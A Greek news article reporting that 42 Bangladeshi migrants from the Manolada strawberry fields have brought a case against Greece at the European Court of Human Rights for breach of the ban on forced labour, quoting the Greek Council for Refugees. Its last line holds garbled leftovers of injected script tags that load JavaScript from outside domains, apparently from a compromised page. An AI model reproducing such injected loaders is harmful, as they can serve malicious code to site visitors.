Στο Ευρωπαϊκό Δικαστήριο Ανθρωπίνων Δικαιωμάτων η υπόθεση της Μανωλάδας

Για παραβίαση του άρθρου της Ευρωπαϊκής Σύμβασης των Δικαιωμάτων του Ανθρώπου περί απαγόρευσης της δουλείας και της καταναγκαστικής εργασίας, κατηγορείται η Ελλάδα μετά από προσφυγή 42 μεταναστών από το Μπαγκλαντές…

Στο εδώλιο του κατηγορουμένου θα “καθίσει” η Ελλάδα για την υπόθεση της Μανωλάδας, καθώς το Ευρωπαϊκό Δικαστήριο Ανθρωπίνων Δικαιωμάτων πρόκειται να εξετάσει, μετά τις 20 Ιανουαρίου, την προσφυγή 42 μεταναστών από το Μπαγκλαντές κατά της χώρας μας για παραβίαση του άρθρου 4 της Ευρωπαϊκής Σύμβασης των Δικαιωμάτων του Ανθρώπου.

Το συγκεκριμένο άρθρο αφορά την απαγόρευση της δουλείας και της καταναγκαστικής εργασίας.

Είναι η πρώτη φορά που εξετάζεται «ελληνική υπόθεση» για το συγκεκριμένο άρθρο και η πρώτη σε ευρωπαϊκό επίπεδο που αναφέρεται σε ένα τόσο μεγάλης κλίμακας φαινόμενο καταναγκαστικής εργασίας. Παράλληλα τέσσερις διεθνείς οργανώσεις ανθρωπίνων δικαιωμάτων και ένα Ακαδημαϊκό ίδρυμα έκαναν παρέμβαση τρίτου στη δίκη.

Οι ελληνικές αρχές καλούνται έως τις 20 Ιανουαρίου 2016 να υποβάλουν τις παρατηρήσεις τους σχετικά με την παράβαση των θετικών υποχρεώσεων που απορρέουν από το άρθρο 4.

“Τα γεγονότα στη Μανωλάδα, τον Απρίλιο του 2013, καθώς και η αντίδραση από την ελληνική κοινωνία και το σύνολο σχεδόν του πολιτικού κόσμου, κατέδειξαν τα προβλήματα αποτελεσματικής αντιμετώπισης εκ μέρους του Ελληνικού Κράτους φαινομένων εργασιακής εκμετάλλευσης και συνθηκών εργασίας, που δεν πρέπει να γίνονται αποδεκτές. Το ΕΣΠ υποστήριξε ως πολιτική αγωγή τα θύματα της Μανωλάδας και στα ελληνικά δικαστήρια”, αναφέρει η ανακοίνωση του Ελληνικού Συμβουλίου για τους Πρόσφυγες.

Και συνεχίζει: “Για την αποτελεσματικότερη αντιμετώπιση των φαινομένων αυτών απαιτείται νομοθετική παρέμβαση και ορθή εφαρμογή στη πράξη ενός σχεδίου δράσης για την αποτροπή των χειρότερων μορφών της καταναγκαστικής εργασίας, τη τιμωρία των δραστών και την προστασία των θυμάτων.

Η προσφυγή ενώπιον του ΕΔΔΑ ελπίζουμε να αποτελέσει ένα πρώτο βήμα στην προσπάθεια για την αποκατάσταση της νομιμότητας και την αποτροπή μελλοντικών «Μανωλάδων».

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >